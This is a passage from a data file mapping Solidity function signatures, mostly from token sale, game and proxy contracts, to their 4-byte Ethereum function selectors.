"Arbitrate(uint32,uint32,bool)": "0x7df52ba8", "approveFromProxy(address,address,uint256)": "0xf11c4482", "approveAndCall(address,address,uint256,bytes)": "0x6d1669e1", "_approve(address,uint256)": "0x7b7d7225", "_applyRefund(uint256)": "0x691d58e7", "applyCensorship(uint256)": "0x9aaf442c", "append(address,address)": "0x94ed9b77", "append(address)": "0xac04f5a7", "announce(string)": "0xea0a5237", "announce_numbers(uint8,uint8,uint8,uint8,uint32,bytes32)": "0x3ef8ec78", "announce(bytes32)": "0x6056969b", "AmountToForgeTheNextBlock()": "0x3b591ea7", "AlwaysFail()": "0x9c0a4bbc", "allowanceFromProxy(address,address,address)": "0xeb06e65e", "allowance(address,address,bytes32)": "0x1c8d5d38", "_allow()": "0xd526b9bd", "allocateFounderTokens()": "0xbcfcb03e", "allocateBountyAndEcosystemTokens()": "0x4a8b5389", "AlarmClockTipFaucet()": "0xa9f8ec6c", "airaTransfer(address,address,uint256)": "0x6d2cb794", "airaSend(address,address,uint256)": "0xe1efda6d", "AiraEtherFunds(string,string)": "0xbd3f0965", "Ai()": "0x98688a95", "Aggregation()": "0xbc21ce9d", "administration(uint256,string,uint256,uint256,address)": "0x40fdef80", "adjustTransactionFee(uint256)": "0x5b6a54bc", "adjustRegistrationFee(uint256)": "0x9da680f3", "addUser(address,uint256,uint8,bytes32,bytes32)": "0x213ac932", "addUnderDog(uint256)": "0x75c4aaa6", "addToken(address)": "0xd48bfca7", "AddTicket(bytes5[])": "0x7f0899f2", "addTender(uint256,uint256,address,uint256)": "0x0e1d88fc", "addTag(uint256,string)": "0x45590ec8", "addString(string,string)": "0x38178fbe", "add(string,uint256,uint256,uint256)": "0x0f3eb785", "add(string,uint256,string,string,address)": "0xd2dc0869", "add(string,uint256)": "0x36555b85", "add(string,string,string,address)": "0x8396392d", "add(string)": "0xb0c8f9dc", "addSponsor(address)": "0xdab80d6f", "totalMintNums()": "0xd292515d", "totalSTACoin()": "0x8066f3c8", "getTokensUnlockedPercentage()": "0x6a739a9b", "getTokensAmountAllowedToWithdraw(uint256)": "0x1c6d4575", "setInitialTokensBalance()": "0xa299b155", "initVestingStages()": "0x85edf68d", "getStageAttributes(uint8)": "0xb9588adc", "getAvailableTokensToWithdraw()": "0x045e240f", "BwinCoin()": "0x9c513bdd", "getSha()": "0xf73d05db", "GGToken(address,string,string,uint256,uint256)": "0x1ef75b1a", "BicycleToken()": "0xbbda1e9a", "printMoney()": "0x94655f2b", "BIAToken()": "0x5ea56918", "closeEarlyPurchase()": "0xae4cc757", "appendEarlyPurchase(address,uint256,uint256)": "0x92dbf585", "numberOfEarlyPurchases()": "0x3f5174df", "purchasedAmountBy(address)": "0x5aa3d2b0", "SYC2ndEarlyPurchase()": "0xf2c8a87b", "balancesImporter6()": "0x663b3f62", "CMDToken()": "0xccfed305", "SwissTrustToken()": "0xafc75b1d", "CryptoSagaArenaRecord(address,uint8,uint8)": "0x47d4106f", "VeritokenToken()": "0x5f0b37e4", "getPropertyPrivateModeLastUpdateEarnUntil(uint16)": "0x1f12da06", "getPropertyOwnerSalePrice(uint16)": "0xcf09e820", "getPropertyLastUpdaterBecomePublic(uint16)": "0x63a6568f", "getPropertyPrivateModeBecomePublic(uint16)": "0xab383a6b", "getPropertyData(uint16,uint256,uint256)": "0xb7b1e3cc", "getRegulatorLevel(address)": "0xbbfa6153", "getPropertyEarnUntil(uint16)": "0x99b29044", "getPropertyBecomePublic(uint16)": "0xfc9ede65", "getPropertyLastUpdate(uint16)": "0x23b11bb1", "getPropertySalePrice(uint16)": "0x1bbc7952", "getPropertyColorsOfRow(uint16,uint8)": "0xc7ff2086", "getPropertyColors(uint16)": "0xe86994ea", "getPropertyLastUpdater(uint16)": "0xba8c0c9d", "getPropertyOwner(uint16)": "0x2ccaa3e9", "getPropertyPrivateMode(uint16)": "0x37c74948", "getPropertyFlag(uint16)": "0x98864aaf", "getOwnerLink(address)": "0xf23a8aa6", "getOwnerHoverText(address)": "0x8b9997fd", "burnPXLRewardPXLx2(address,uint256,address,uint256,address,uint256)": "0x121c2b35", "burnPXLRewardPXL(address,uint256,address,uint256)": "0x2a396734", "burnPXL(address,uint256)": "0xf6f8ca07", "rewardPXL(address,uint256)": "0x26728b14", "setPropertyOwnerSalePrice(uint16,address,uint256)": "0x45ede900", "setPropertyOwnerSalePricePrivateModeFlag(uint16,address,uint256,bool,uint8)": "0xb9e58ab0", "setPropertyBecomePublicEarnUntil(uint16,uint256,uint256)": "0xc575200d", "setPropertyLastUpdaterLastUpdate(uint16,address,uint256)": "0x15f59033", "setPropertyPrivateModeEarnUntilLastUpdateBecomePublic(uint16,bool,uint256,uint256,uint256)": "0x886b148d", "setPropertyEarnUntil(uint16,uint256)": "0x17e0aeb8", "setPropertyBecomePublic(uint16,uint256)": "0xb4cc2181", "setPropertyLastUpdate(uint16,uint256)": "0x411b65ef", "setPropertySalePrice(uint16,uint256)": "0x6d87b65c", "setPropertyLastUpdater(uint16,address)": "0xc19358bb", "setPropertyOwner(uint16,address)": "0xd5c98db1", "setPropertyPrivateMode(uint16,bool)": "0x4b1ec20c", "setOwnerLink(address,uint256[2])": "0x6fcdcb3e", "setOwnerHoverText(address,uint256[2])": "0x606bc9a5", "setPropertyRowColor(uint16,uint8,uint256)": "0x3953ca8b", "setPropertyColors(uint16,uint256[5])": "0xeb39bc90", "setPropertyDAppContract(address,bool)": "0x16514052", "setPixelPropertyContract(address)": "0xc839008e", "setRegulatorAccessLevel(address,uint8)": "0x95f47e4e", "setPropertyFlag(uint16,uint8)": "0x8d106690", "PXLProperty()": "0x0c087782", "ClickGemTokenERC20(uint256,string,string)": "0x1f583087", "ESCToken()": "0x8497a8d8", "Token(address,address,uint256)": "0x9c9205b6", "rejectUpgrades()": "0x041e6b8b", "allowUpgrades()": "0x4dcf2917", "setTokenUpgrader(address)": "0xcd61cb3a", "isTokenUpgrader()": "0xea2ce651", "startMinting()": "0x9a65ea26", "FUS()": "0xa335b828", "TKTToken()": "0x1e7cedb7", "refundWallet(address)": "0xde889d50", "FoxicoPool(uint256,uint256,address)": "0xf85f0972", "setRefundEnabled(bool)": "0x044431f0", "Couchain(uint256,string,string)": "0x5650e5e0", "BALVINDER()": "0x145e818f", "Sperm()": "0xe4845c2f", "redeemShip(uint256)": "0xd74ae98e", "setFactoryAsset(uint256,uint16)": "0x63581c04", "EthernautsVendingMachine()": "0x11d40001", "PrimebankCoin(uint256,address)": "0x671bdc3d", "whitelistAllAddresses()": "0x006932bb", "whitelistAddress(address)": "0x41566585", "OdinToken()": "0x0df2dcd2", "CCPLUS(uint256,string,string)": "0x5ebe4746", "ThrowbackThursdayToken()": "0x7fc32915", "setTokensByWaveIndex(uint256,uint256,uint256)": "0xa225d0be", "setTokensWave(uint256,uint256[10])": "0x36c5787e", "setLastPrice(uint256,uint256)": "0x731e1c94", "setBuyer(uint256,address)": "0xde667e70", "setBonus(uint8[5])": "0x89c55845", "setCountdown(uint256[5])": "0xb0dd478a", "getTokensPerWave(uint256)": "0x33271a3b", "getBonuses()": "0x6597a076", "setPet(uint8,address,string,uint8,uint16,uint16,uint16)": "0x68586e57", "createPetCardSeries(uint8,uint32)": "0x505ed108", "getRandomNumber(uint16,uint8,address)": "0x62161235", "updateMaintenanceMode(bool)": "0x45e26105", "removeSERAPHIM(address)": "0x7123691e", "addSERAPHIM(address)": "0xd356a28b", "Teaeum(uint256,string,string)": "0x15544fc2", "WYQToken(uint256,string,string)": "0xcb3ab271", "startPostICO()": "0xefd12624", "claimTokensBC(uint8)": "0x5cc52fba", "claimTokensE(uint8)": "0xb99b951d", "postICO(address,address,address,address,address,address,uint256)": "0x96ac591e", "ICO(address,address,uint256,uint256,uint256)": "0x5d7c3ad2", "preICO(address,address,uint256,uint256)": "0x299599cc", "EYTToken()": "0x9999aae5", "KickcityToken()": "0x4d3bdb82", "calcKicks(uint256)": "0x9b53a396", "usdCollected()": "0x47a1a2d6", "setUsdEthRate(uint256)": "0x3b0a895d", "InnovateToken()": "0xbe45af43", "UtrustToken()": "0x4ec0744d", "hasAssetRights(address,bytes32)": "0xccc11f11", "issueAsset(bytes32,uint256,string,string,uint8,bool,address)": "0xa3ff0ea2", "symbolsCount()": "0xecac7f4b", "symbols(uint256)": "0xccce413b", "TPN()": "0xae896b2e", "Scc()": "0x9c8f8569", "ParaTransfer()": "0xb83e9662", "SuperFruit(uint256,string,string)": "0xb71f7f1c", "GRAD()": "0xe676d53f", "setWildcardList(address,address,bool)": "0xd0a826f3", "setLockupList(address,address,uint256)": "0x8e4d0a83", "setWhitelist(address,address,uint256)": "0x80bfbe68", "setAllowTransferExternal(bool)": "0x57fbac06", "setAllowTransferLocal(bool)": "0x957e05d6", "setAllowTransferGlobal(bool)": "0x9ad74f81", "setManager(address,bool)": "0xa5e90eee", "allowManager()": "0xb36f8e8f", "allowTransfer(address,address)": "0xfddfec78", "sendTokens(address[],uint256)": "0xa338eba5", "AirDrop(address)": "0xd8b98fca", "getMemeHolders()": "0xf28063ce", "purchaseCollectible(uint256)": "0x390c0ddd", "EtherMemes()": "0x1e65dc88", "GCHToken(string,string,uint8,uint256)": "0x4bda87b5", "WrapperLockEth(string,string,uint256,address)": "0x04ccf60e", "allocateCandyToken(address[],uint256[])": "0xc6e6ab03", "allocateToken(address[],uint256[],uint256[])": "0xc34f783d", "setCrowdsaleClosed(bool,bool)": "0x41d4a39e", "getPeriod(uint256,uint256)": "0x35caecc3", "calcReleaseToken(address)": "0x9903a2bd", "getLockBalance(address)": "0x55f78af8", "setRealseTime(uint256)": "0xac56f980", "setTransferOCE(bool,bool)": "0x701d9ced", "acceptNewOwner()": "0xf05a781d", "issueTokenAndApprove(uint256,uint256,address)": "0x23aa6a17", "issueTokenAndTransfer(uint256,uint256,address)": "0x1f6275bb", "issueToken(uint256,uint256)": "0xa4093718", "CryptoThreeKingdoms()": "0x85899cee", "isAmountAllowed(address,uint256)": "0xcbc598c5", "addToWhiteList(address,uint256)": "0x5ac87d76", "_payRoyalty()": "0xbcbc1585", "notarise(bytes32)": "0xe7e9f385", "Notary()": "0xe6885aad", "HumanStandardToken(uint256,string,uint8,string,uint256)": "0x8ba5758b", "Metaexchange(address,address,address,uint256,uint256,uint256)": "0x7a2b2dd7", "transferAndLock(address,uint256,uint256)": "0x84d5d944", "unlockTimeOf(address)": "0x469a6947", "lockedOf(address)": "0xa5f1e282", "LinkCoinToken()": "0x9c893d73", "AceFundToken()": "0x2a2514a2", "FundToken()": "0x97d7f2ee", "PolarisUniversalToken()": "0x42e1452a", "Ethraffle_v2b()": "0xe95b2bb8", "CPCE()": "0xa47f519b", "safeSubtrCPCE(uint256,uint256)": "0x739112da", "LuckyWorldCupToken()": "0x6474dd4c", "addEvidence(bytes32,uint256,bytes32,uint8,bytes32,bytes32)": "0x9cdb4fe8", "addAudit(bytes32,uint256,bytes32,uint8,bytes32,bytes32)": "0x986bf5e8", "addAuditOrEvidence(bool,bytes32,uint256,bytes32,uint8,bytes32,bytes32)": "0xacd47b3a", "addEvidence(bytes32,uint256,bytes32)": "0x91174790", "addAudit(bytes32,uint256,bytes32)": "0xd9114476", "isVerifiedCode(address,bytes32)": "0x821e4496", "isVerifiedAddress(address,address)": "0xc490dfa6", "DonatorSetBanner(string)": "0x3716b8b4", "DonatorInteract(string)": "0xb39ad6e0", "Donate(string)": "0x2af37ba0", "burn(address[16],uint256)": "0x9ef279d1", "mint(address[16],address,uint256)": "0x3a1460ac", "removeToken(address[16],address,uint256)": "0x7e2a0141", "addToken(address[16],address,uint256)": "0x96ad704a", "clearApprovalAndTransfer(address[16],address,address,uint256)": "0x732bdbbf", "clearApproval(address[16],address,uint256)": "0x370292eb", "approve(address[16],address,uint256)": "0xc36ccedc", "balanceOf(address[16],address)": "0xad7f02b5", "ownerOf(address[16],uint256)": "0xd6e4ddc5", "BdpOwnershipStorage(bytes8)": "0x9cc28aa0", "setTokenIdsIndex(uint256,uint256)": "0x9ea27016", "getTokenIdsIndex(uint256)": "0xf50b486d", "decrementTokenIdsLength()": "0x145cf0c2", "tokensToIssue()": "0xe564f88e", "secondRefundRoundRateNumerator()": "0x36944e49", "REFERRAL_BONUS_PERMILLE()": "0x491a6155", "advisersUnvested()": "0x77e5d8f8", "withhold()": "0xd2c51c72", "lockBalances()": "0x690d3750", "EGGS_TO_HATCH_1DRAGON()": "0x8783bf1a", "preDiscountPercentage()": "0xdb8f7fb5", "totalMintAmount()": "0xd0045341", "deposits_until_jackpot()": "0x13cfed7f", "feePayment()": "0x33c7c026", "baseEthCap()": "0x49af0af1", "SPARCAddress()": "0x7175d709", "secondOwner()": "0x68a9f31c", "isSaleFinished()": "0x6d6f385c", "swapFee()": "0x54cf2aeb", "totalUsedTokens()": "0xad63a469", "addrLockUp()": "0x22bf1a2a", "getTotalAmountRaised()": "0xd86e762d", "startBetRed()": "0x1e52aa52", "hold()": "0x00e0c53f", "amountLeft()": "0xe011ac87", "totalIssuedEarlySale()": "0x63036f86", "return_pause()": "0xf765e6e4", "FOUNDATION_SHARE()": "0x3723f149", "mintedTokensCap()": "0x0348946d", "enableDonation()": "0xa4d22c13", "CONTRIB_PERIOD1_STAKE()": "0xe92b6818", "crowdsaleContractAddress()": "0x9c481c9e", "icoMinCap()": "0xfcb0339e", "coinIssuedSale()": "0x2d62f428", "transferTime()": "0xe08e433a", "snt()": "0x060eb520", "WALLET_T8EX_TEAM()": "0x9c4063ce", "erc20old()": "0x9de66604", "firstBonusEnds()": "0xae136d62", "mspController()": "0x372a49bd", "teamOneSharePrice()": "0x5d5b92b1", "yearlyRewardPercentage()": "0x0e4aed3f", "isSalePaused()": "0x008ca816", "difficultyBalance()": "0xdaa170ca", "distributeALCToken()": "0xfb5fef42", "INTERVAL()": "0x89facb20", "allUnKycedEth()": "0xacc99bb7", "randDelay()": "0x88e2da99", "lastPriceFeed()": "0x49465d33", "isBCDCToken()": "0xccb64997", "MAX_PRIVATE_FUNDING_SUPPLY()": "0x5009432d", "Menu05()": "0xc7bce243", "betexStorage()": "0x36a36f7c", "destTokensAirdrop()": "0xf2b7a54b", "dev3Wallet2Pct()": "0xb154f47c", "getEtherInContract()": "0x5ce22019", "tradeEnabled()": "0xd621e813", "unsoldTokensWallet()": "0x0957de9a", "walletOwnerAddress()": "0xa0df9538", "promisee()": "0x474ce872", "getMinimumPurchaseVZTLimit()": "0x5b63831a", "ratePreSale()": "0x489d426e", "maxAmountRoundSeed()": "0xa9604239", "endTimeRound1()": "0xb1fca956", "brickPrice()": "0xd8e20e2c", "teamTokensPercent()": "0x93167204", "_releaseTime()": "0x2208ee1d", "jpyc()": "0x550ed61b", "tokensForMarketing()": "0x1f3fed8f", "tokenTransfersEnabled()": "0xb6ac4984", "allTotalSupply()": "0xc90fc8ee", "PROJECTOPERATION_SUPPLY()": "0xe1cd5fc0", "betAmount_()": "0x8c46c7cd", "migrationAgentCandidate()": "0x0dc36f2a", "verificationCodeHash()": "0x41af1524", "MIN_STARTING_PRICE()": "0x7c67fb9f", "lockStartTime()": "0x62c7fa76", "lockAll()": "0x76e44ed8", "remainingCapInWei()": "0xd6755434", "marriageProofDoc()": "0xac5ce03b", "INITIAL_mulFactor()": "0x6510cc17", "icoThresholdBonus3()": "0xd3363dd7", "ROLE_KYC_VERIFIED_INVESTOR()": "0x7025b3ac", "carTaxiCrowdsale()": "0x5ab68072", "NUM_OF_CHOICES()": "0x9bc5689d", "cliffReleasePercentage()": "0xa804da18", "gameNum()": "0x0064b1f8", "waitingTime()": "0xaa13e8c2", "TIER3()": "0x0d65d50b", "maxMSC()": "0x12e26673", "stage_1_add()": "0x9bf1c389", "burnPREICOTokens()": "0x210d14b8", "staffContract()": "0xfc28bc8f", "determiningWinner()": "0x736660ac", "priceStep5()": "0x379ca09e", "maxFunding()": "0x596b975a", "batch()": "0xaf713566", "lockInDays()": "0xe48c3c5c", "maxTokenSale()": "0x2dd2f86b", "metadataUrlSuffix()": "0xd4d6d366", "bitwordsWithdrawlAddress()": "0xbf7ff81e", "lastBlock_a15()": "0xb048357d", "BNN()": "0x9bf97e74", "performTheMagicTrick()": "0x5b91fd60", "TokenXGroup()": "0x97fed5f2", "canSort()": "0x922427de", "EtherModifierMonstro()": "0x0ebe4acb", "Amberella()": "0x8244ee58", "ZoharTC()": "0xa399eb76", "utfStringLength(bytes4)": "0x4fb67111", "getIndexAndCheckIfAllowedToPublish(uint256,uint256)": "0xd3cde1c0", "storeAttachment(string)": "0xb74c13f1", "publishBatch(uint16,uint16,string,string,bytes3)": "0xf98b19f4", "publish(uint16,uint16,bytes4,string,bytes3)": "0x29f958dc", "buy(uint16,uint16,uint16,uint16)": "0x87a3903e", "read(uint16,uint16)": "0xdbc53c07", "SanityRates(address)": "0x40c9e804", "read(uint256)": "0xed2e5a97", "write(string,uint256)": "0xe55834cb", "Storychain()": "0x6aa96d7c", "stringLength(string)": "0xb118060e", "updateBonusPercent(uint256)": "0xee8e993c", "TheTokenF()": "0x76888a3e", "zt()": "0x2623297e", "batchTransferETHs(address[],uint256[])": "0x98fa6c8a", "batchTransferETH(address[])": "0x7e968195", "batchTransferToken(address,address[],uint256)": "0xe60b7ff7", "splitFunds(address,address)": "0x2accf2f7", "Token(string,string,uint256,uint256)": "0x8f061ef5", "BD0Token()": "0x62df5b7d", "isAccountAddress(address)": "0x250a8dc2", "registerEOSAddress(string)": "0xfb2fbf49", "TCASH()": "0x89341f6e", "owner_BurnUpdateTokenFrom(address,uint256)": "0xea251c2f", "owner_TransferFromTo(address,address,uint256)": "0x1f7266e8", "owner_AirdropUpdateToken(address[],uint256)": "0xde3849be", "owner_LockUpdateTokenAccount(address,bool)": "0x460c3be5", "owner_ActivatePOS(bool)": "0x73d45ba4", "getUpdateTokenAge(address,address,uint256)": "0x7120d381", "getProofOfStakeRewardUpdateToken(address,address)": "0x4d8589c5", "convertDecimalBack(uint256)": "0x031a8161", "convertDecimal(uint256)": "0x20799608", "annualInterestUpdateToken()": "0xc9dd3a56", "updateTokenAge()": "0x559e5e06", "Goldic()": "0xac001725", "TestingToken()": "0x3f3c594c", "LocalToken()": "0x70708a3c", "bezpolToken()": "0x85e00e4b", "UltrixCoin()": "0xd1778ed7", "PiexT(uint256,string,uint8,string)": "0x54e7e98c", "PonziTokenV3()": "0x2e660475", "paySmartContract(bytes32,uint256)": "0xaf77649d", "_createProxy(address)": "0x3adf96d7", "createProxyAndCall(address,address,bytes)": "0xc6e8b4f3", "createProxy(address,address)": "0x25b56727", "_setAdmin(address)": "0x3a74a767", "_admin()": "0x01bc45c9", "_setImplementation(address)": "0xbb913f41", "_fallback()": "0xaf8f35c4", "_willFallback()": "0x2ce14d90", "_delegate(address)": "0xf13101e9", "_implementation()": "0x59679b0f", "QueryFrozenCoins(address)": "0x50d78f7d", "UnfreezeAccountByTime(address)": "0x9073576c", "freezeAccountByTime(address,uint256)": "0x40394dcc", "_refulshFrozenInfo(address)": "0x0e4739b1", "_resetFrozenInfo(address)": "0x573939de", "ONTOPToken(uint256,string,string)": "0x53bc1d9b", "TestCoin2()": "0xe819172a", "TheTokenH()": "0x18a08d2d", "clearGame()": "0xf131a7ae", "winners()": "0xa487bcd8", "processWinner()": "0x0a01ad4d", "newPlayer(uint256,uint256)": "0xe37a7fff", "cloneArray(uint256[],uint256)": "0xed03a5b3", "nonZero(uint256)": "0xe22baa56", "produceLottoNumber(uint256,uint256)": "0xbe0d4da4", "PineapplePoints()": "0xf636931e", "getETHx2(uint256)": "0x64c403d4", "ETHx2()": "0x274b9bc5", "DemoraCash()": "0x34d09ff1", "parseRLPHeader(bytes)": "0x2fb88284", "parseAndStore(bytes)": "0xaf224bdc", "ValidateAndStore(bytes,bytes)": "0xaad52373", "getRoots()": "0x35a5e06d", "getHashes()": "0x4245d48e", "ITECToken(uint256,string,string)": "0x809837c1", "PhenixToken(uint256,string,uint8,string)": "0x39ef9105", "update(address,address)": "0xc640752d", "maskIt(address,uint256)": "0xd03d9604", "WEMACOIN()": "0x8e9674c8", "whoOwnsYou()": "0x9bd658d9", "XBHX()": "0xbae2ddb5", "PalmToken()": "0xc0463810", "HitToken(string,string,uint8,uint256,address,address,address,address)": "0x76c2f9e7", "CDC()": "0x2e42f80c", "modifyAuthorizedCaller(address,address)": "0x7d41cc60", "capture(bytes32)": "0x8b44c99a", "sneakUpOn()": "0xaadc0a9d", "Flag()": "0xf54dd191", "test(address[5],uint256[5])": "0x59761fcb", "BLMCH()": "0xbcfea3e4", "TMSYToken(address,address)": "0xf773c770", "PRECOE()": "0x15aaa09b", "CyCo()": "0xb6f3c071", "sellOneStep(uint256,uint256,address)": "0x63f8a211", "getSalePrice(uint256)": "0xf8eb5fc5", "getPurchasePrice(uint256)": "0xc59d5633", "getQuotePrice()": "0xeba6a307", "getReserveBalances()": "0x77d56a04", "setMultiplier(uint256)": "0x641579a6", "setReserveWeight(uint256)": "0xeff841d1", "depositTokens(uint256)": "0xdd49756e", "revokeAdminStatus(address)": "0xfa62a1ff", "_grantAdmin(address)": "0x7126b6ff", "grantAdmin(address)": "0x35bb3e16", "Unihorns(uint256,string,string)": "0x0c3b3b70", "setTokensPerEther(uint256)": "0x904bd6d0", "stopPayouts()": "0x01e56c77", "startPayouts()": "0x0b74074b", "AKM()": "0xd5a2040e", "extraEmission(uint256)": "0xf78a706a", "emissionPay(uint256)": "0xe310c2ca", "transferToken()": "0x799a5359", "ProofOfCloneWars()": "0x5f6e388a", "getTotalPlayers()": "0x4529cae7", "getTotalEth()": "0x0e9d56a2", "getMultiSigBalance()": "0xcca10ba5", "getMultiSigWallet()": "0x62721129", "setFinalized(bool)": "0x20b27291", "setOneTokenInWei(uint256)": "0x13823365", "OwOWorldToken()": "0x1b2d26e9", "PODH()": "0x225a1d46", "JimatCoin()": "0xd3c7adf9", "changeAssetOwner(address)": "0xdde3ae6d", "issueTokens(uint256,string)": "0xef941dca", "Buy()": "0x974c86b5", "_withdraw(bool)": "0xb7fa265a", "NewPrice()": "0xe1eb5f87", "distributeBonusTokensByList(address[])": "0x632e44af", "getBonusList()": "0x4e12e51a", "distributeBonusTokens()": "0x3140b09e", "withdrawToken()": "0xca628c78", "modifyTokenPrice(uint256)": "0xcdc57fd3", "lockTransfer()": "0x1a9aea0a", "addManyToBlacklist(address[])": "0x2815f50f", "addToBlacklist(address)": "0x44337ea1", "getUserCap()": "0xd950cc3c", "deleteOwner(address)": "0xcd5c4c70", "WorldReserveCurrency()": "0x759242fd", "MyAdvancedToken()": "0xb7b9dead", "FBEE()": "0x5107c0a8", "PAN()": "0xbf686453", "DWalletToken()": "0xa67de805", "MSTCOIN()": "0xcc6e70e8", "allowTransfersEnabled(bool)": "0xe7aefd01", "changeTokensPerEther(uint256)": "0x2c08eb0b", "changeTokenController(address)": "0xd6c8976b", "KoreaShow(uint256,uint256,address,address)": "0x972711cc", "changePriceLimits(uint256,uint256)": "0x043d0258", "Universe()": "0x37a920f1", "setYcmContractAddress(address)": "0x92e18d9f", "setYctContractAddress(address)": "0x450a9105", "setYccContractAddress(address)": "0x5e25f96d", "setMainYouCollectContractAddresses(address,address,address,address[])": "0xb4c5c983", "addYouCollectContract(address,bool)": "0x82a147cd", "payoutMining(uint256,address,address)": "0xb4d60cfd", "createMineForToken(uint256,uint256,uint256,uint256,uint256)": "0xde306341", "payoutForMining(address,uint256)": "0xaa2796fd", "tradePreToken(uint256,address,address,uint256,address)": "0xae065737", "mintCoinsForOldCollectibles(address,uint256,address)": "0x7c9c3d89", "payForUpgrade(address,uint256)": "0x8c9fcfe2", "createCollectible(uint256,uint256,address,address)": "0x324365b1", "lastSubTokenCreatorOf(uint256)": "0x79e8b8eb", "lastSubTokenBuyerOf(uint256)": "0x03792d52", "ownerShipTransfer(address)": "0xcd635b71", "BITS(uint256,string,uint8,string)": "0x26c30b50", "ICOStartToken(uint256)": "0x496fd2c5", "setGameBanker(address)": "0x436d8fd6", "bid(address,uint256)": "0x59d667a5", "_setAuctionObj(address,uint256,uint256)": "0x7ccf0d44", "addWhiteListAddSetAuctionObj(address,uint256,uint256)": "0xd4d9f559", "setAuctionObj(address,uint256,uint256)": "0xa2cdd82f", "isWhiteListGame(address)": "0xd7a084e0", "delWhiteList(address)": "0x605e5ee1", "addWhiteList(address)": "0xe7cd4a04", "_addIndexGame(address)": "0x3a963033", "setShareholder(address,bool)": "0xb5f16e48", "setOfficialUrl(string)": "0x4c78529e", "Beneficial()": "0x0221f2fb", "_userRefund(address)": "0x113b2eff", "userRefund()": "0x60f8dab7", "bankerEndTime()": "0xfd93236b", "profitOrgPay()": "0xed7caa8e", "Buy(address,uint256,uint256)": "0x1cbc5ab1", "PlaceSellOrder(uint256,uint256)": "0x1bd983a4", "_cancelOrder(address)": "0xdd5dd552", "CancelOrder()": "0x1adf2bec", "GetDivs(address)": "0x18eacb96", "_withdraw(address,uint256,bool,uint256)": "0x54dcc49b", "ViewSellOrder(address)": "0x82b1b617", "_forceTransfer(address,address,uint256)": "0xe977fa76", "Dividends()": "0xf15f14c5", "PERCENT_DELIMITER()": "0xbb2408e6", "totalMintedBountyTokens()": "0x431454fb", "udfVUPDestination()": "0xb0d9fef9", "CROWD_SUPPLY()": "0x81f1a41b", "TOKEN_RATE_CROWDSALE()": "0xc47028c1", "stage_3_add()": "0x24c1f9c7", "_END_DATE()": "0x752551c9", "lastTreeId()": "0xb1ae9887", "crossForkDistribution()": "0xb6581516", "Funding_Setting_cashback_time_start()": "0xf8408a8d", "AVAILABLE_BONUS1_SUPPLY()": "0x2ceae552", "placesSold()": "0x39f931b2", "releasedTeam()": "0x38e4b06b", "total_user_eth()": "0x06dc5d7f", "tokensCommunity()": "0xeea8465a", "walletRemaining()": "0x9d3e1ab8", "shippingDate()": "0xc3332621", "secondCrowdSaleDate()": "0x63c439a6", "tokenR6()": "0xbe4aba09", "ownerLocked()": "0x3287d0dc", "EXTERNAL_QUERY_GAS_LIMIT()": "0xf06bbf75", "__address3__()": "0xf1bd5978", "countGames()": "0x69d2ce29", "MAX_TOTAL_AMOUNT_TO_RECEIVE_ETH()": "0xc5d22e94", "BONUS_COEFF()": "0xde0b5af2", "recordNum()": "0x3037801e", "PUBLIC_SALES_3_RATE()": "0x3aedded5", "totalCandyNo()": "0xb408ac01", "eth_min()": "0xe6714f63", "KNC()": "0xe992d8d8", "currentIterationSupplyLimit()": "0xfc82d0f7", "roles()": "0x392f5f64", "NigelFundSum()": "0x1bca7d6d", "heapSort(uint8[])": "0xa4b06df2", "ESCROW_TOKENS_PERCENT()": "0x7f4c7064", "manager2()": "0x77acbb22", "lotteryCore()": "0xcc1602df", "seq()": "0x6857ab40", "oldDBAddress()": "0x7e7dd581", "WALLET_MARKETING()": "0x2e3ca08c", "icoPhaseDiscountPercentage3()": "0x15527006", "day_blocks()": "0x5958978c", "isIcoStart()": "0x3ecafef5", "eventName()": "0x8043c9c0", "preSaleThirdPrice()": "0xc185e492", "nextSale()": "0xf5f2b62f", "rateEth()": "0x52608d85", "deathData_a5()": "0x9b8b365d", "bonusTierSize()": "0xb9d7fdf4", "satoshi_bth_decimals()": "0xc4c3718b", "oraclizeDelay()": "0xc55374d0", "unpauseTransfer()": "0x2bfea0e4", "_firstUnlockAmmount()": "0x9f7496ec", "AVAILABLE_ADVISOR_SUPPLY()": "0xed0e4665", "giveBlockreward()": "0x9085e88d", "sunsetWithdrawDate()": "0xfa2e9db8", "refundingComplete()": "0x47bafa82", "amountInvested()": "0xd954cbcb", "parentSnapshotId()": "0xa899ef57", "jackpotMinimumAmount()": "0x71bad4d8", "predictMarket()": "0x7e09f0aa", "enableAuthentication()": "0x90be0bd9", "totalMembers()": "0x76e92559", "rootAddress()": "0xaaa2b8c8", "maxAllowedBetInTokens()": "0x345bc544", "allocatorAddress()": "0xa0abdba0", "allToken()": "0xa998146b", "uservalue()": "0xe65b99c6", "lastBlock_a12Hash_uint256()": "0x7a78ee2c", "rateLastWeekEnd()": "0x46287ddb", "totalBountyTokens()": "0x4077aaf8", "mintFinished()": "0x75143ef2", "storageAddr()": "0x97df573e", "numberOfKingdoms()": "0x33ae88ad", "odem()": "0xbc6b12b3", "xem()": "0x13fac256", "mntpMigrationsCount()": "0x32ec39a4", "HATCHING_COST()": "0x7d87bb7b", "Date_Started()": "0xde0498d3", "pause_3()": "0x2e081f31", "startStage1()": "0x8bc5816a", "ChangePrice()": "0x07fb37d4", "unfreezeTime()": "0xd76dddd3", "getBCDTRateForCurrentRound()": "0xffe48c76", "mainSaleEtherCap()": "0xbfce0b7f", "logoPrice()": "0xa290f4f2", "unitUserBalanceLimit()": "0x6d106885", "militaryToken()": "0xe0ea129e", "rateFeesNumerator()": "0x263f6a42", "PhoenixExchangeDeposit()": "0x4324ae4f", "mintingFee()": "0x5a64ad95", "firstCheckpointPrice()": "0xbe6c554f", "_bonusRatio2()": "0x822e1506", "canIssue()": "0x0899a99c", "organizer1()": "0xfa82e9fc", "advisorySupply()": "0xd8afd392", "LifeFactor_i()": "0x68c646f3", "BONUS_2_DAYS()": "0x0d13ea7d", "savior()": "0xdfa78bf5", "EditMode()": "0x4d1c5f83", "fundingEndBlock()": "0x91b43d13", "isFinalized()": "0x8d4e4083", "tokenCreationCap()": "0x6f7920fd", "tokenExchangeRate()": "0x4172d080", "batFund()": "0x229a4978", "batFundDeposit()": "0x01a7a8c0", "createTokens()": "0xb4427263", "withdraw(address,address,uint256)": "0xd9caed12", "watch(address)": "0x58e2cd76", "tokenDeposit(address)": "0x73053f70", "calculeReward(uint256,uint256)": "0x18573bf9", "_reward(address[])": "0xc0b4fa6d", "_deposited(address,address,uint256)": "0x640a4d0c", "withdraw(address[])": "0xbd5dec98", "setTokenList(address[])": "0x342b7e71", "confirm(address)": 